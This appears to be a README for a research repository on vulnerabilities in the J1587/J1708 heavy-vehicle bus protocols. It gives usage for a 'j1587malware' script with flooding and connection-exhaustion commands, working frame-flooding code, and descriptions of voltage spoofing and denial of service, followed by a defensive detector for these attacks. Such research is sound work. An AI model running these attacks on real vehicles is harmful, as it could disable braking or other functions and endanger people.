The J1587 protocol, similar to the J1939 protocol, is unencrypted and lacks robust security features, making it susceptible to various attacks. This repository provides insights into the vulnerabilities associated with J1587/J1708 and suggests possible mitigations that would enhance the security of trailer communications, or other legacy devices that still use these protocols.
Previous work on J1587/J1708 vulnerabilities has been limited, with most research focusing on the J1939 protocol. However, because many legacy systems still rely on J1587/J1708 for communication, it is crucial to understand and address the vulnerabilities present in these protocols; the prior work we build on is collected under the literature directory. We aim to fill this gap by providing a comprehensive overview of the vulnerabilities in J1587/J1708 and demonstrating practical examples of attacks and mitigations, especially within the transport layer.
The DG Diagnostics Adapter is a hardware device that connects to the vehicle's diagnostic port and allows for communication with the J1587/J1708 bus. It uses RP1210 DLLs to interface with the bus, enabling the sending and receiving of messages. The adapter is essential for testing and demonstrating vulnerabilities in J1587/J1708 communications. More information about the DG Diagnostics Adapter can be found at DG Diagnostics.
The j1708-rp1210.py script is a Python implementation that interacts with the J1708 bus using RP1210 DLLs. It allows for sending and receiving messages on the J1708 bus, making it a useful tool developed mainly for dumping J1708/J1587 messages and evaluating the bus's behavior under different conditions. The script can be found here under the scripts directory.
Example usage:

```shell
python32 .\j1708-rp1210.py --api DGDPAXL --pretty --log ..\hv_legacy_vulnerabilities\j1587DoS\DTDSC-6067MK60\normal-tp-traffic-config-rp1210.log --metadata
```
This script was developed for research evaluations on the J1587 bus and should only be used in that setting.
To use the script, you must be on a py-hv-network compatible device (see TruckCape below):

```text
python3 j1587malware.py -h
usage: j1587malware.py [-h] --cmd CMD ...

J1708/J1587 Malware Script for TruckCape

positional arguments:
  args        Arguments for the command

optional arguments:
  -h, --help  show this help message and exit
  --cmd CMD   Command to execute
```

The currently available commands are:

```text
python3 j1587malware.py --cmd request-overload
Usage: request-overload <target-mid> <attacking-mid> <count> <interval> <data>

python3 j1587malware.py --cmd static
Usage: static <count> <interval> <frame>

python3 j1587malware.py --cmd connection-exhaustion
Usage: connection-exhaustion <target-mid> <attacking-mid> <count> <interval> <data>
```

To add more commands to the J1587 malware script, simply register it in the script's command registry.
For example:

```python
import time  # used for the delay between sends

# `register_command` (the command registry decorator) and `driver` (the TruckCape
# J1708 driver) are defined elsewhere in j1587malware.py and are not shown here.
@register_command('static')
def static(args):
    '''Sends one or more static frames to the bus a fixed number of times.'''
    if len(args) < 3:
        print("Usage: static <count> <interval> <frame1> [Optional <frame2> ... <frameN>]")
        return
    count = int(args[0])       # how many times each frame is sent
    interval = float(args[1])  # delay in seconds between sends
    frames = args[2:]          # hex-encoded frames
    for frame in frames:
        print(f"[*] Sending J1587 message: {frame} {count} times, every {interval} seconds.")
        for _ in range(count):
            driver.send_message(bytes.fromhex(frame))
            time.sleep(interval)
```

The TruckCape is a hardware device that provides an interface for J1708 communications. It is an asset because it does not necessarily follow the J1708 standard for timing, which allows us to break the J1708 protocol and send messages at a higher rate than the standard allows. This can be used to demonstrate vulnerabilities such as Denial of Service (DoS) attacks on the J1708 bus. More information about the TruckCape can be found here.
The Pretty J1587 tool is a Python script that formats J1587 messages for easier readability. It can be used to analyze and interpret J1587 messages captured from the bus, making it easier to understand the communication patterns. The script can be found here.
The Saleae Logic Analyzer is a hardware device used to capture and analyze digital signals. It can be used to monitor J1587/J1708 communications, allowing for the observation of message timing, content, and bus behavior during attacks or normal operations. More information about the Saleae Logic Analyzer can be found here.
Attackers can send false messages to the vehicle's electronic control unit (ECU), potentially leading to incorrect readings or actions by the vehicle or other nodes on the bus. This can include sending false diagnostic messages or altering vehicle parameters. The example under the spoofing directory shows how an attacker can inject false Battery Voltage messages onto the bus, which changes the diagnostic adapter's (DGDPAXL) readings and displays an incorrect battery voltage. The implications of this attack can range from misleading diagnostics to potentially dangerous vehicle operations (e.g., altering speed or braking parameters).
An attacker can flood the J1708 bus with excessive messages, overwhelming the system and preventing legitimate messages from being processed. This can disrupt vehicle operations and lead to safety issues. The standard specifies a BAT (Bus Access Time) of 10 bit times + (2 * Priority) for message transmission, which can be exploited by sending messages at a high rate to saturate the bus. The implications of this attack can include loss of control over vehicle functions, delayed responses to critical events, and potential safety hazards for both the vehicle and its surroundings (e.g., lost control of braking). An example of this attack can be found under j1708DoS.
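As an added example (not code from this repository), the following Python checks captured J1708/J1587 frames from the defender's side for the two conditions described above: a battery-voltage report (PID 168) arriving from a MID other than the expected one (the spoofing case) and any MID exceeding a message-rate threshold inside a one-second window (the flooding case), after rejecting frames whose checksum fails. The MIDs, the sample traffic, the spam PID and the threshold are constructed; PID 168 as battery voltage at 0.05 V/bit, low byte first, is assumed from J1587.

```python
# Added example, not code from this repository: offline checks over captured J1708/J1587
# frames for bad checksums, unexpected-source voltage reports, and per-MID flooding.
from collections import defaultdict

PID_BATTERY_VOLTAGE = 168   # J1587 PID 168, 2 bytes, 0.05 V/bit (assumed from J1587)
ENGINE_MID = 128            # constructed: the MID we expect to report battery voltage

def build_frame(mid, pid, data):
    """Encode MID, PID, data and the J1708 checksum (two's complement of the byte sum)."""
    body = bytes([mid, pid]) + bytes(data)
    return body + bytes([(-sum(body)) % 256])

def checksum_ok(frame):
    """A valid J1708 frame, checksum included, sums to zero modulo 256."""
    return len(frame) >= 3 and sum(frame) % 256 == 0

def battery_voltage(data):
    """Decode PID 168: 16-bit value, low byte first, 0.05 V per bit."""
    return round(int.from_bytes(data[:2], "little") * 0.05, 2)

def analyze(log, expected_voltage_mid, max_msgs_per_sec):
    """log: iterable of (timestamp_s, frame_bytes), one PID per frame. Returns alert tuples."""
    alerts = []
    per_mid_times = defaultdict(list)  # recent timestamps per sending MID
    for ts, frame in log:
        if not checksum_ok(frame):
            alerts.append((ts, "bad-checksum", frame.hex()))
            continue
        mid, pid, data = frame[0], frame[1], frame[2:-1]
        if pid == PID_BATTERY_VOLTAGE and mid != expected_voltage_mid:
            alerts.append((ts, "unexpected-voltage-source", mid, battery_voltage(data)))
        times = per_mid_times[mid]
        times.append(ts)
        while ts - times[0] > 1.0:       # keep a one-second sliding window
            times.pop(0)
        if len(times) > max_msgs_per_sec:
            alerts.append((ts, "flood", mid, len(times)))
            times.clear()                # one alert per burst
    return alerts

def sample_log():
    """Constructed traffic: normal readings, a spoofed reading, a corrupted frame, a burst."""
    log = [(float(i), build_frame(ENGINE_MID, PID_BATTERY_VOLTAGE, [0x1C, 0x01]))
           for i in range(5)]                                                   # 14.2 V
    log.append((5.0, build_frame(200, PID_BATTERY_VOLTAGE, [0xB4, 0x00])))      # 9.0 V, wrong MID
    bad = bytearray(log[0][1])
    bad[-1] ^= 0xFF                                                             # corrupt the checksum
    log.append((5.5, bytes(bad)))
    log += [(6.0 + i * 0.01, build_frame(200, 84, [0x00])) for i in range(30)]  # burst, constructed PID
    return log
```

Running `analyze(sample_log(), ENGINE_MID, 20)` yields one alert per condition; on real captures the expected MID and the threshold should come from a baseline of normal traffic such as the rp1210 logs above.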
